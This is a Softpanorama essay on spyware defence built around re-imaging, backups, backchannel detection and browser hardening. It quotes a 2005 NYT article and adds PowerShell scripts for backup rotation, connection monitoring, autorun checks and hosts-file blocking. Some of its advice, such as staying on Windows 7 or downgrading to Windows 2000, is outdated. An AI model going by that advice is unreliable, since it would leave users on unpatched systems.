Softpanorama

Fighting Spyware

Introduction

If you follow the Softpanorama spyware removal strategy you can remove most types of spyware, no matter how complex and sophisticated the infection method is. The only exception is encryption-based extortionware such as Cryptolocker (Win32/Crilock.A): the infection itself can be removed, but the encrypted data can only be recovered from a backup.

Yes, spyware can be complex, extremely annoying and obnoxious, as well as extremely difficult to remove (and the latest banking and data-encryption Trojans are a serious warning). Typically the period between the moment malware gets onto your computer and the moment the installed AV program detects it varies from hours to several weeks or even months. For less widespread, regional or highly specialized ("government sponsored", etc.) malware it can be years.

At the same time, while protecting a PC with a scanning AV program alone is never enough, paranoia about spyware is completely unwarranted. Despite the tremendous increase in spyware complexity and capabilities in recent years, restoring the OS from a "healthy" C-drive image, using a bootable CD created beforehand on another (non-infected) computer, is a sure way to defeat even the most complex spyware. One important lesson that extortionware such as Cryptolocker (Win32/Crilock.A) taught is that there should always be two sets of backups (say A and B), and that each week you should switch from one set to the other. Periodic backup to a double-layer DVD also makes perfect sense if your backup image is smaller than 8 GB: a backup on a USB hard drive can be attacked, while a backup on a finalized DVD cannot be altered after it has been written. Another way to defeat the attempts of data-encryption Trojans to destroy your backups is to move your current backup image daily via FTP or SCP to a different, Linux-based backup computer.
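The A/B rotation and the daily off-box copy described above, as an added example (this is not code from the original page). It assumes hypothetical values that you would adjust: the image is D:\Backup\current.tib, the two sets live under D:\Backup\SetA and D:\Backup\SetB, the Linux host is backup.example.lan, reached as user "vault" with an SSH key, and scp.exe (the Windows OpenSSH client) is on PATH. Get-FileHash needs PowerShell 4 or later.

```powershell
# Added example, not code from the original page: weekly A/B backup-set
# rotation plus a daily push of the current image to a separate Linux host
# over scp. All paths, host and user names below are assumptions.

Set-StrictMode -Version Latest

function Get-BackupSetName {
    # Alternate between set A and set B every ISO week, so that at any moment
    # one complete set has not been touched for at least a week.
    param([datetime]$Date = (Get-Date))
    $cal  = [System.Globalization.CultureInfo]::InvariantCulture.Calendar
    $rule = [System.Globalization.CalendarWeekRule]::FirstFourDayWeek
    $week = $cal.GetWeekOfYear($Date, $rule, [System.DayOfWeek]::Monday)
    if ($week % 2 -eq 0) { 'SetA' } else { 'SetB' }
}

function Copy-BackupImage {
    param(
        [Parameter(Mandatory)][string]$ImagePath,
        [Parameter(Mandatory)][string]$BackupRoot,
        [datetime]$Date = (Get-Date)
    )
    $set  = Get-BackupSetName -Date $Date
    $dest = Join-Path $BackupRoot $set
    New-Item -ItemType Directory -Path $dest -Force | Out-Null
    $name   = 'image-{0}{1}' -f $Date.ToString('yyyyMMdd'), [IO.Path]::GetExtension($ImagePath)
    $target = Join-Path $dest $name
    Copy-Item -Path $ImagePath -Destination $target -Force
    # Record a SHA-256 next to the copy, in sha256sum format, so the Linux side
    # (and you, later) can tell an intact image from a damaged or tampered one.
    $hash = (Get-FileHash -Path $target -Algorithm SHA256).Hash.ToLowerInvariant()
    "$hash  $name" | Set-Content -Path "$target.sha256" -Encoding ascii
    [pscustomobject]@{ Set = $set; Path = $target; Sha256 = $hash }
}

function Push-BackupImage {
    param(
        [Parameter(Mandatory)][string]$LocalPath,
        [string]$RemoteHost = 'backup.example.lan',    # assumption
        [string]$RemoteUser = 'vault',                 # assumption
        [string]$RemoteDir  = '/srv/backup/incoming'   # assumption
    )
    foreach ($file in @($LocalPath, "$LocalPath.sha256")) {
        & scp.exe -q $file "${RemoteUser}@${RemoteHost}:${RemoteDir}/"
        if ($LASTEXITCODE -ne 0) { throw "scp failed for $file (exit code $LASTEXITCODE)" }
    }
}

# Daily run: copy today's image into this week's set, then push it off-box.
$copy = Copy-BackupImage -ImagePath 'D:\Backup\current.tib' -BackupRoot 'D:\Backup'
Push-BackupImage -LocalPath $copy.Path
$copy
```

One caveat a practitioner would add: if the Windows box holds credentials that can delete or overwrite files on the Linux side, a data-encryption Trojan running on it can use those credentials too. Restrict the key in the Linux user's authorized_keys to a forced command that only accepts new files (or have the Linux host pull the image on its own schedule instead), and run `sha256sum -c` there before treating the copy as good.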

This "backup-based disinfection" is a three-step approach. You can read about it in Softpanorama Malware Defense Strategy. Here are the contents:

Formally, spyware is any software that uses your computer's Internet connection in the background (as a "backchannel"), operating without the user's knowledge or explicit permission. That definition actually covers a lot of modern commercial software. The presence of such a backchannel gives a simple way to detect even the most sophisticated spyware, and a TCP/IP sniffer is often an adequate tool for this. For example, you can switch to another computer (periodic switching between computers is another good practice, as it keeps your "reference image" tested and up to date) and watch, for a week or so, what communications your "old" PC or laptop initiates, using the sniffer logs. That also helps a lot against "spyware paranoia" (NSA under every bed ;-).
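A host-side stand-in for the "watch what the old PC talks to for a week" check, as an added example (not code from the original page). It parses `netstat -ano` output, keeps outbound TCP connections, maps each to its owning process and counts in how many samples a process/destination pair showed up. The netstat lines in $sample are constructed, so the process names reported for them will be whatever happens to own those PIDs on your machine, or "gone". The sniffer on another host or on the router, as the page recommends, remains the authoritative view: a rootkit can hide connections from netstat on the infected box, not from a capture upstream.

```powershell
# Added example, not code from the original page: sample outbound TCP
# connections with their owning process and summarize them against an allowlist.

Set-StrictMode -Version Latest

function ConvertFrom-Netstat {
    # Turns lines such as
    #   TCP    192.168.1.10:52311     93.184.216.34:443      ESTABLISHED     4120
    # into objects; header lines and UDP rows do not match and are skipped.
    param([Parameter(Mandatory)][string[]]$Lines)
    foreach ($line in $Lines) {
        if ($line -match '^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\w+)\s+(\d+)\s*$') {
            [pscustomobject]@{
                LocalAddress  = $Matches[1]; LocalPort  = [int]$Matches[2]
                RemoteAddress = $Matches[3]; RemotePort = [int]$Matches[4]
                State         = $Matches[5]; ProcessId  = [int]$Matches[6]
            }
        }
    }
}

function Get-OutboundConnections {
    param(
        [string[]]$NetstatOutput = (& netstat.exe -ano),
        [datetime]$SampledAt = (Get-Date)
    )
    ConvertFrom-Netstat -Lines $NetstatOutput |
        Where-Object { @('ESTABLISHED', 'SYN_SENT') -contains $_.State -and
                       $_.RemoteAddress -notmatch '^(127\.|0\.0\.0\.0$|\[::1\])' } |
        ForEach-Object {
            $owner = Get-Process -Id $_.ProcessId -ErrorAction SilentlyContinue
            $name  = if ($owner) { $owner.ProcessName } else { "<pid $($_.ProcessId) gone>" }
            $_ | Select-Object *, @{ n = 'Process'; e = { $name } }, @{ n = 'SampledAt'; e = { $SampledAt } }
        }
}

function Find-Backchannel {
    # One row per process/destination pair with the number of distinct samples
    # it appeared in; destinations that are not on the allowlist sort to the top.
    param(
        [Parameter(Mandatory)][object[]]$Connections,
        [string[]]$AllowedRemote = @()
    )
    $Connections | Group-Object Process, RemoteAddress, RemotePort | ForEach-Object {
        $first = $_.Group[0]
        [pscustomobject]@{
            Process = $first.Process
            Remote  = '{0}:{1}' -f $first.RemoteAddress, $first.RemotePort
            Samples = @($_.Group | Select-Object -ExpandProperty SampledAt -Unique).Count
            Allowed = [bool]($AllowedRemote -contains $first.RemoteAddress)
        }
    } | Sort-Object Allowed, @{ Expression = 'Samples'; Descending = $true }
}

# Constructed sample of `netstat -ano` output; addresses and PIDs are made up.
$sample = @'
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       812
  TCP    192.168.1.10:52311     93.184.216.34:443      ESTABLISHED     4120
  TCP    192.168.1.10:52390     198.51.100.7:8080      ESTABLISHED     2216
  TCP    192.168.1.10:52401     198.51.100.7:8080      SYN_SENT        2216
  TCP    127.0.0.1:5354         127.0.0.1:49152        ESTABLISHED     1020
'@ -split "`r?`n"

$conns = Get-OutboundConnections -NetstatOutput $sample
Find-Backchannel -Connections $conns -AllowedRemote @('93.184.216.34') | Format-Table -AutoSize

# Live use: one sample every 10 minutes for an hour, then the same summary.
#   $all = 1..6 | ForEach-Object { Get-OutboundConnections; Start-Sleep -Seconds 600 }
#   Find-Backchannel -Connections $all -AllowedRemote @('93.184.216.34') | Format-Table -AutoSize
```

On the constructed sample the loopback and listening rows drop out, the 93.184.216.34:443 row is marked allowed, and the two 198.51.100.7:8080 rows collapse into one unallowed row seen in one sample. Over a week of live samples the interesting rows are the ones that keep reappearing for a process you did not start.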

Spyware is usually connected with some way of getting advertising revenue, propagating spam or similar things. In a few cases it tries to steal and use your financial information (so-called banking Trojans). And in very rare cases it is there to monitor your activities. In any case, spyware is now mostly a "for profit" criminal business, and these criminals have enough money to pay developers and buy exploits. That means each new generation of spyware is more sophisticated than the previous one. Interest in this type of program from the NSA and other three-letter agencies does not help either: the methods they develop with government funds and highly paid developers are eventually revealed and then flow downhill from spooks to financial criminals. The story of the malware used to damage the Iranian uranium enrichment program is quite instructive in this respect; see Duqu Trojan, Flame and Stuxnet. Those three alone advanced the "state of the art" of spyware development considerably, essentially creating a "new era" in malware (as in "before Stuxnet" and "after Stuxnet").

In any case, we can safely assume that these days few spyware/adware programs are primitive enough to launch themselves from a single Run key (so that removing that key disinfects the computer).
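Checking the Run keys is still the first thing to do, provided you compare against a known-good state rather than eyeballing. As an added example (not code from the original page), the script below lists the common registry autostart locations and diffs them against a baseline exported from the trusted image; the baseline path D:\Baseline\autoruns.csv is an assumption, chosen because the data drive survives re-imaging. The list of keys is deliberately short; Sysinternals Autoruns covers many more locations.

```powershell
# Added example, not code from the original page: enumerate registry autostart
# entries, export a baseline from the trusted image, and report NEW/CHANGED
# entries on the live machine. Paths under Temp or AppData are flagged.

Set-StrictMode -Version Latest

$AutorunKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run'
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
    'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'   # only Shell and Userinit
)

function Get-AutorunEntries {
    foreach ($key in $AutorunKeys) {
        if (-not (Test-Path -Path $key)) { continue }
        $props = (Get-ItemProperty -Path $key).PSObject.Properties
        foreach ($p in $props) {
            if ($p.Name -like 'PS*') { continue }     # PSPath, PSChildName, ... added by the provider
            if ($key -like '*\Winlogon' -and @('Shell', 'Userinit') -notcontains $p.Name) { continue }
            [pscustomobject]@{
                Key        = $key
                Name       = $p.Name
                Command    = [string]$p.Value
                Suspicious = [bool]([string]$p.Value -match '\\(Temp|AppData\\(Local|Roaming))\\')
            }
        }
    }
}

function Export-AutorunBaseline {
    param([Parameter(Mandatory)][string]$Path)
    Get-AutorunEntries | Export-Csv -Path $Path -NoTypeInformation -Encoding UTF8
}

function Compare-Autoruns {
    # Emits live entries that are absent from the baseline (NEW) or whose
    # command line differs from it (CHANGED); unchanged entries stay silent.
    param([Parameter(Mandatory)][string]$BaselinePath)
    $baseline = @{}
    foreach ($b in @(Import-Csv -Path $BaselinePath)) {
        $baseline["$($b.Key)|$($b.Name)"] = $b.Command
    }
    foreach ($e in @(Get-AutorunEntries)) {
        $id = "$($e.Key)|$($e.Name)"
        if (-not $baseline.ContainsKey($id)) {
            $status = 'NEW'; $was = ''
        } elseif ($baseline[$id] -ne $e.Command) {
            $status = 'CHANGED'; $was = $baseline[$id]
        } else { continue }
        [pscustomobject]@{
            Status = $status; Key = $e.Key; Name = $e.Name
            Command = $e.Command; Baseline = $was; Suspicious = $e.Suspicious
        }
    }
}

# Right after restoring the trusted image (baseline path is an assumption):
#   Export-AutorunBaseline -Path 'D:\Baseline\autoruns.csv'
# Later, on the live machine:
#   Compare-Autoruns -BaselinePath 'D:\Baseline\autoruns.csv' | Format-Table -AutoSize
Get-AutorunEntries | Format-Table -AutoSize
```

Take the baseline from the freshly restored image, never from the machine you suspect. A clean diff here proves little on its own (services, scheduled tasks, WMI subscriptions and browser add-ons are not in this list), which is exactly why the page falls back on re-imaging rather than on hunting keys.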

Generally, any use of an Internet "backchannel" connection should be preceded by complete and truthful disclosure, followed by explicit, informed consent for such use. Often spyware is disguised as a useful utility (an atomic clock, a toolbar, a free game, etc.). In this case the developer does not disclose that, in addition to its openly stated function, the program uses the PC's Internet connection to send information about your activities, or even your data, to a third party. The sites you visited are typical of the information sent (WeatherBug is one classic example).

Spyware often deliberately complicates its removal from the computer, or tries to reinstall itself by downloading missing components if one component is removed.

The spyware problem is not purely a Windows security problem; the situation is more complex. While the insecurity and architectural flaws of the Windows operating system aid malware in general, the channel for spreading spyware is usually the Web, and specifically the Google search engine, which for some reason does not mark DNS names that are less than a month old (many "watering hole" spyware distribution sites belong to this category). We really need something for IE that blocks sites whose DNS name was registered less than a month or so ago. OpenDNS is an interesting option in this respect. Such a check could be incorporated into DNS prefetching:

The DNS Prefetch addon for Firefox enables DNS Prefetching which is a method of resolving and caching DNS lookups before you actually click on a link. DNS prefetching just resolves domain names before a user tries to navigate, so that there will be no effective user delay due to DNS resolution. One example where prefetching can help is when a user is looking at a page with many links to various other domains, for instance a search results page.

With DNS Prefetching, Firefox automatically scans the content of each page looking for links, extracting the domain name from each link, and resolving each domain to an IP address. All this work is done in parallel with the user's reading of the page. When a user clicks on any of these pre-resolved names to visit a new domain, they save an average of over 250ms in navigation.

Some potentially useful methods in protection

Spyware is a more serious problem than a simple annoyance: your privacy is being invaded. That is why you should never store your tax and banking data on the PC you use for browsing the Internet. Use a separate PC; this additional $300 investment is probably the best investment you can make to protect yourself from viruses and Trojans that steal financial data. If you have enough technical knowledge you can use two different virtual machine images on the same computer. I also would not recommend storing copies of your bank account password in the browser: spyware can install additional software on your machine without your consent that extracts this information and decrypts it. Also, the mere fact that what you are doing on your computer is being watched by an unknown third party right now does not provide any comfort, although you need to understand that browsing the Internet is no longer an anonymous activity unless you use a VPN or similar methods. Now logs of all your visits are stored somewhere, at least temporarily, and usually not only for the sites you visited: advertising plugins such as those used by Google also store this information unless you disable JavaScript or block them in some other way. And advertising vendors have developed sophisticated methods of tracking your identity even if you disable or periodically destroy all cookies. Just switch your browsing session from one computer to another and see how the advertising reflects your previous activity.

Email spam and deceptive advertising of sites via Google or other search engines are still the major channels through which spyware penetrates PCs. Google search results are an especially nasty and effective channel. Be careful not to land on "grey zone" sites on the PC you use for your daily work. If you can't live without browsing grey areas of the Internet, buy a Google Chromebook (such as the Acer C720 11.6" Chromebook) or an Android tablet and browse those areas exclusively from it, or install Ubuntu on one of your old PCs. Using an OS other than Windows represents an additional layer of protection: most attacks are still directed at Windows users with Intel-compatible CPUs and Windows XP, Windows 7 or Windows 10 installed. Using a different OS and/or CPU architecture gives you substantial additional protection via the "security by obscurity" effect.

Spyware authors, like virus authors, look for a particular category of gullible and greedy users: despite all the bad experience, some people just can't avoid clicking on "Get Kool Mouse Pointerz Here" or "Free Microsoft Office 2013" links, either in search results or in email ;-). Using an email client that disables all "rich content" and hides attachments, such as Thunderbird, provides a free and effective layer of protection against such threats.

An ounce of prevention is worth a pound of cure. Here are some potentially useful methods for those who use the IE browser:

  1. Do not upgrade to versions of the Microsoft OS higher than Windows 7. After Windows 7, Microsoft itself went into the spyware business in full force; for example, it now wants you to authenticate to your PC using a Hotmail account, which essentially gives it free information on when and how you use your PC. Although you can enhance your privacy using specific Windows 10 privacy settings (see for example 5 Tips to Increase Your Privacy With Windows 10 by Matthew Held, or just search "how to enhance windows 10 privacy" in any search engine you use), it is definitely more intrusive "by design" than Windows 7, probably by a considerable factor.
  2. Treat your C drive as disposable. Learn to periodically wipe your Windows C drive and restore it from a "trusted" backup kept on a write-protected hard drive or USB drive. This idea of periodically wiping the drive and reinstalling a trusted image is simple and a very effective method of fighting complex spyware, including government-sponsored spyware. (As it would destroy the Microsoft brand, Microsoft brass will probably try to avoid letting Microsoft updates be used to install government spyware, unless the case is connected with national security, which is a very broad notion these days; but government agencies, and not only they, can definitely use the update channels of other vendors: a typical Windows installation contains at least a dozen commercial programs, each with its own update channel, any of which can be compromised, making such a computer one big security hole no matter which AV program you use.) This method is especially attractive for small companies that do not have dedicated security staff to watch for Windows threats. It also eliminates the need to spend money on commercial AV (the free Microsoft Security Essentials is "good enough" in this case), and you no longer need to worry about the unending, stupid and dangerous patches of Adobe Reader and other crapware. Microsoft will reapply its patches, and if you keep your files on a drive other than C there is not much to do after the reinstallation. Other patches can be ignored, as the shelf life of this instance is limited; if they are needed, apply them to the trusted image first. The minimal adjustments required can be scripted using PowerShell or whatever tool you are comfortable with.
  3. Use two virtual instances of the OS, or at least two browsers, with Microsoft IE set to the high security level and used for browsing unknown sites. The key to protecting your browser against new web threats is disabling JavaScript and ActiveX. There are also some utilities that can enhance the level of security in this area, but I do not follow this area closely. Long ago Trend Micro USA provided Browser Guard, a free utility that used advanced heuristics and emulation technologies to detect JavaScript exploits; the latest version (2011) included improved detection of web Trojans and tracing of infection chains. But it is better to disable JavaScript altogether for "grey area" browsing, and using a virtual machine is a much better deal.
  4. Use a DNS server that protects from "new and hot" sites: many malware distribution sites are less than six months old despite ranking high in Google searches for certain keywords. Just blocking sites "younger" than six months stops a lot of Trojans cold. One possibility is OpenDNS.
  5. Install a router-based firewall with an Internet filter, or the free K9 Web Protection. If you know Linux you can use a Linux-based router and tune it to prevent re-infections.
  6. If you have Linux know-how, install and use a squid proxy on a separate PC.
  7. Practice a "separation of duties" policy with a cheap Chromebook laptop or a separate OS instance launched as a virtual machine. You can use the virtual machine capabilities of Windows 7 and install a "disposable" copy of Windows XP in which you do all your browsing. This does not prevent you from getting spyware (and encryption malware can still encrypt your data), but the 99% level achieved by wiping out the "used" image is good enough to make this a worthwhile technique. If you know Linux you can use a Linux instance for browsing instead of XP: Linux has its own exploits, but it stops all Windows exploits dead without any patching, and both the GUI and the browser (Firefox) are quite usable. You can also downgrade your Windows to Windows 2000; modern exploits react badly to such an old version of the OS.
  8. Never do "leisure" browsing from an account with admin privileges. Create yet another account and use only it for browsing the Web. When you browse unknown sites, run IE only under a regular user account that can't write to the machine-wide parts of the registry (use the "Switch user" option; it is really fast and convenient, although most users have never tried it). Starting with Windows Vista and Windows 7, Microsoft introduced User Account Control (UAC), which, when enabled, lets users run with least privilege. This limits the possibility of attacks by malware and other threats that require administrative privileges to run.

    UAC can be configured on your computer to meet your preferences.

  9. Add all sites that you deem suspicious to the Restricted zone in IE. You can do it before clicking on a link in Google by creating a macro on a programmable keyboard such as the Logitech G510s gaming keyboard or the SideWinder X4.

    If you detect spyware on your computer, before removal look at the network connections the computer makes and try to "cut off the oxygen" by adding the sites it accesses to the hosts file and to the Restricted zone. That might help prevent re-infection.

  10. If you install a trial version of software, use "try and forget" software to eliminate these guests, as they do not always uninstall themselves completely. Avoid "trial" versions in general, as they can overburden your computer with unnecessary or harmful components and might not uninstall cleanly, presenting the same danger as spyware (a hidden channel to the vendor). A couple of vendors provide a "try and forget" environment; one is the Try&Decide feature of Acronis True Image:

    Acronis True Image

    You can run your system in a special try mode with the Try&Decide feature. In this mode you can try out new applications or experiment with the system while being sure that you can always discard the changes made to the system and revert it back to the state it was just before turning on the Try&Decide mode.

    When you turn on the Try&Decide mode, the product activates a special Acronis driver, which starts reading all requests to the protected partition and forwards these to the storage location you have selected.

  11. Install Microsoft Security Essentials, which is free and contains some real-time protection components. While this gives you only a minimal level of protection, it is better than nothing and actually not much worse (and probably has fewer harmful components) than the paid versions of McAfee, Symantec and the like. Being mostly signature-based, like any signature-based tool it is not very effective, and you can be infected with any spyware that is not yet in its database; but it is still better than nothing and in my opinion better than many commercial AV tools. Also, with time even new spyware becomes old and will be detected and, hopefully, correctly disinfected.
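Items 8 and 9 above (browse only from a non-admin account with UAC on; put suspect sites in the Restricted zone and the hosts file to "cut off the oxygen") can be checked and applied from PowerShell. The script below is an added example, not code from the original page. Test-BrowsingSession reports whether the current session is elevated, whether the account is in Administrators at all, and the UAC settings; Block-Domain adds a domain to the hosts file (needs an elevated shell) and to the IE Restricted sites zone for the current user (zone 4, no elevation needed). The registry paths are the standard ones; the domain name in the demo is constructed.

```powershell
# Added example, not code from the original page: verify the browsing session
# runs with least privilege, and block a domain via hosts + IE Restricted zone.

Set-StrictMode -Version Latest

function Test-BrowsingSession {
    $identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object Security.Principal.WindowsPrincipal($identity)
    $elevated  = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
    # With UAC on, an admin account's normal session carries a filtered token:
    # IsInRole says "no", but the Administrators SID (S-1-5-32-544) is still present.
    $inAdmins  = [bool]($identity.Groups | Where-Object { $_.Value -eq 'S-1-5-32-544' })
    $uac = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $findings = @()
    if ($elevated) { $findings += 'shell is elevated; never browse from here' }
    if (-not $elevated -and $inAdmins) { $findings += 'account is in Administrators (filtered token); browse from a standard user account' }
    if ($uac.EnableLUA -ne 1) { $findings += 'UAC is disabled (EnableLUA != 1)' }
    if ($uac.ConsentPromptBehaviorAdmin -eq 0) { $findings += 'UAC elevates silently (ConsentPromptBehaviorAdmin = 0)' }
    [pscustomobject]@{
        User = $identity.Name; Elevated = $elevated; InAdministrators = $inAdmins
        EnableLUA = $uac.EnableLUA; ConsentPromptBehaviorAdmin = $uac.ConsentPromptBehaviorAdmin
        Findings = $findings
    }
}

function Block-Domain {
    # Points $Domain and www.$Domain at 0.0.0.0 in the hosts file and puts the
    # domain (all subdomains, all protocols) into IE's Restricted sites zone.
    param([Parameter(Mandatory)][string]$Domain, [switch]$SkipHosts)
    $Domain = $Domain.Trim().ToLowerInvariant().TrimStart('.')
    if ($Domain -notmatch '^[a-z0-9.-]+\.[a-z]{2,}$') { throw "not a bare domain name: $Domain" }

    if (-not $SkipHosts) {
        $hosts    = Join-Path $env:SystemRoot 'System32\drivers\etc\hosts'
        $existing = Get-Content -Path $hosts -ErrorAction Stop
        Copy-Item -Path $hosts -Destination "$hosts.bak" -Force
        $added = @()
        foreach ($name in @($Domain, "www.$Domain")) {
            # Skip names already mapped on a non-comment line.
            $pattern = '^\s*[^#]\S*\s+' + [regex]::Escape($name) + '(\s|$)'
            if ($existing -match $pattern) { continue }
            $added += "0.0.0.0`t$name"
        }
        if ($added) { Add-Content -Path $hosts -Value $added -Encoding ascii }
    }

    # IE zone map: ...\ZoneMap\Domains\<domain> with value '*' = 4 (Restricted sites).
    $zoneKey = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\$Domain"
    if (-not (Test-Path -Path $zoneKey)) { New-Item -Path $zoneKey -Force | Out-Null }
    New-ItemProperty -Path $zoneKey -Name '*' -Value 4 -PropertyType DWord -Force | Out-Null
}

Test-BrowsingSession | Format-List
# Demo with a constructed name; drop -SkipHosts in an elevated shell to also edit hosts.
Block-Domain -Domain 'ads-tracker.example' -SkipHosts
```

Two caveats. The hosts file only stops software that resolves names through the system resolver; spyware that connects to a raw IP address, or that runs with enough rights to rewrite hosts, is not affected, which is why the page treats this as a stopgap before removal rather than a cure. And the HKCU zone entry applies to IE (and the WebBrowser control) for the current user only; to cover every account, put the same key under HKLM and enable "Security Zones: Use only machine settings".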

High level of paranoia about spyware in mainstream press

Unless you are targeted by government agencies, spyware can be eliminated. If you use a separate PC for vital tasks, the chance of getting spyware on this "more secure" PC is really small. Using several virtual machines on an 8 GB laptop is a no-brainer and also provides a reasonably high level of protection (many types of advanced spyware detect the presence of a VM environment and refuse to run in it, fearing that they are being watched or analyzed).

Still, there is a high level of paranoia about spyware in the mainstream press. Sometimes it reaches the really stupid level of "if your computer is infected, discard it and get a new one". A pretty telling example of this paranoia was the NYT article by Matt Richtel and John Markoff, "Corrupted PC's Find New Home in the Dumpster" (July 17, 2005). The main hero of this article (who is said to hold a PhD in computer science) demonstrates a simply amazing level of ignorance of the Windows OS (unless this was just a pretext to upgrade his old computer ;-).

SAN FRANCISCO, July 15 - Add personal computers to the list of throwaways in the disposable society.

On a recent Sunday morning when Lew Tucker's Dell desktop computer was overrun by spyware and adware - stealth software that delivers intrusive advertising messages and even gathers data from the user's machine - he did not simply get rid of the offending programs. He threw out the whole computer.

Mr. Tucker, an Internet industry executive who holds a Ph.D. in computer science, decided that rather than take the time to remove the offending software, he would spend $400 on a new machine.

He is not alone in his surrender in the face of growing legions of digital pests, not only adware and spyware but computer viruses and other Internet-borne infections as well. Many PC owners are simply replacing embattled machines rather than fixing them.

"I was spending time every week trying to keep the machine free of viruses and worms," said Mr. Tucker, a vice president of Salesforce.com, a Web services firm based here. "I was losing the battle. It was cheaper and faster to go to the store and buy a low-end PC."

In the face of a constant stream of pop-up ads, malfunctioning programs and performance slowed to a crawl or a crash - the hallmarks of spyware and adware - throwing out a computer "is a rational response," said Lee Rainie, director of the Pew Internet and American Life Project, a Washington-based research group that studies the Internet's social impact.

While no figures are available on the ranks of those jettisoning their PC's, the scourge of unwanted software is widely felt. This month the Pew group published a study in which 43 percent of the 2,001 adult Internet users polled said they had been confronted with spyware or adware, collectively known as malware. Forty-eight percent said they had stopped visiting Web sites that might deposit unwanted programs on their PC's.

Moreover, 68 percent said they had had computer trouble in the last year consistent with the problems caused by spyware or adware, though 60 percent of those were unsure of the problems' origins. Twenty percent of those who tried to fix the problem said it had not been solved; among those who spent money seeking a remedy, the average outlay was $129.

By comparison, it is possible to buy a new computer, including a monitor, for less than $500, though more powerful systems can cost considerably more.

Meantime, the threats from infection continue to rise, and "the arms race seems to have tilted toward the bad guys," Mr. Rainie said.

The number of viruses has more than doubled in just the last six months, while the number of adware and spyware programs has roughly quadrupled during the same period, said Vincent Weafer, a senior director at Symantec, which makes the Norton computer security programs. One reason for the explosion, Symantec executives say, is the growth of high-speed Internet access, which allows people to stay connected to the Internet constantly but creates more opportunity for malicious programs to find their way onto machines.

Mr. Weafer said an area of particular concern was infections adept at burying themselves in a computer system so that the cleansing programs had trouble finding them. The removal of these programs must often be done manually, requiring greater technical expertise.

There are methods of protecting computers from infection through antivirus and spyware-removal software and digital barriers called firewalls, but those tools are far from being completely effective.

"Things are spinning out of control," said David Gelernter, a professor of computer science at Yale.

Mr. Gelernter said his own family's computer became so badly infected that he bought a new one this week. He said his two teenage sons were balking at spending the hours needed to scrub the old one clean of viruses, worms and adware.

Mr. Gelernter blames the software industry for the morass, noting that people are increasingly unwilling to take out their "software tweezers" to clean their machines.

Microsoft executives say they decided to enter the anti-spyware business earlier this year after realizing the extent of the problem.

"We saw that a significant percentage of crashes and other problems were being caused by this," said Paul Bryan, an executive in the company's security business unit. Windows XP Service Pack 2, an upgrade to the latest Windows operating system that has been distributed to more than 200 million computers, includes an automated malware removal program that has been used 800 million times this year, he said.

At least another 10 million copies of a test version of the company's spyware removal program have been downloaded. Yet Microsoft executives acknowledged that they were not providing protection for people who have earlier versions of the company's operating system. And that provides little comfort for those who must navigate the perils of cyberspace.

Terrelea Wong's old computer now sits beside her sofa in the living room, unused, except as a makeshift table that holds a box of tissues.

Ms. Wong, a physician at Kaiser Permanente Medical Center in South San Francisco, started getting a relentless stream of pop-up ads a year ago on her four-year-old Hewlett-Packard desktop computer. Often her entire screen would turn blue and urge her to "hit any key to continue." Sometimes the computer would freeze altogether.

After putting up with the problem for months, Ms. Wong said she decided last November that rather than fix her PC, she would buy a new one. Succumbing to the seduction of all the new bells and whistles, she spent $3,000 on a new Apple laptop.

She is instituting new rules to keep her home computer virus-free.

"I've modified my behavior. I'm not letting my friends borrow my computer," she said, after speculating that the indiscriminate use of the Internet by her and her friends had led to the infection problems.

Peter Randol, 45, a stockbroker for Charles Schwab in Denver, is at his wits' end, too. His family's four-year-old Dell computer has not been the same since last year when they got a digital subscriber line for high-speed Internet access. Mr. Randol said the PC's performance has slowed, a result he attributes to dozens of malicious programs he has discovered on the computer.

He has eliminated some of the programs, but error messages continue to pop up on his screen, and the computer can be agonizingly slow.

"I may have no choice but to buy a new one," he said, noting that he hopes that by starting over, he can get a computer that will be more impervious to infection.

Buying a new computer is not always an antidote. Bora Ozturk, 33, who manages bank branches in San Francisco, bought a $900 Hewlett-Packard computer last year only to have it nearly paralyzed three months ago with infections that he believes he got from visiting Turkish news sites.

He debated throwing the PC out, but it had pictures of his newborn son and all of his music files. He decided to fix it himself, spending 15 hours learning what to do, then saving all his pictures and music to a disk and then wiping the hard drive clean - the equivalent of starting over.

For his part, Mr. Tucker, the Salesforce.com executive, said the first piece of software he installed on the new machine two weeks ago was antivirus software. He does not want a replay of his frustrations the last month, when the attacks on his old machine became relentless.

"It came down to the simple human fact that maintaining the old computer didn't pay," he said.

If we assume that "Mr. Tucker, an Internet industry executive who holds a Ph.D." really holds a PhD in computer science, it is clear that he is either an idiot or a crook. With all due respect to this PhD holder, I think any holder of an associate or bachelor degree in computer science should be able to reinstall the Windows OS. Moreover, even a bachelor degree in computer science presupposes some interest in, and level of understanding of, OS internals and TCP/IP networking ;-).

But there is something rational in this naive and deceptive NYT drivel: having a second computer helps to fight spyware. A used computer of decent quality can be bought for less than $200 on eBay. With a second computer you can switch to it and continue your work instead of frantically trying to disinfect the current machine. Actually, the blunders most damaging to your data are made not by viruses or Trojans but by users who try to fix the computer without fully understanding the consequences of their actions. In a way, the classic scenario of Sysadmin Horror Stories, so intimately known to every Unix sysadmin, is replayed here with a different OS and different players.

Beware too greedy AV vendors

Beware of AV vendors that try to create hysteria and profit from it. In my opinion both Symantec and McAfee have lost track and use "grey" methods of increasing sales of their, generally speaking, mediocre products. Microsoft Security Essentials and other similar free AV programs, while far from perfect, are good enough for most users, and the money spent on McAfee should generally be spent on better backup drives and the like.

Generally, there are strange bedfellows in this spyware business. See Jesse Willms Settles in Court with Google – a Google Win against the Scammers (Strangely Perfect).

Factory installed image as a spyware protection tool

Actually, cleaning spyware is not rocket science, as you can always restore the OS from a healthy image, or reinstall Windows and your software, and then merge your data with this image.

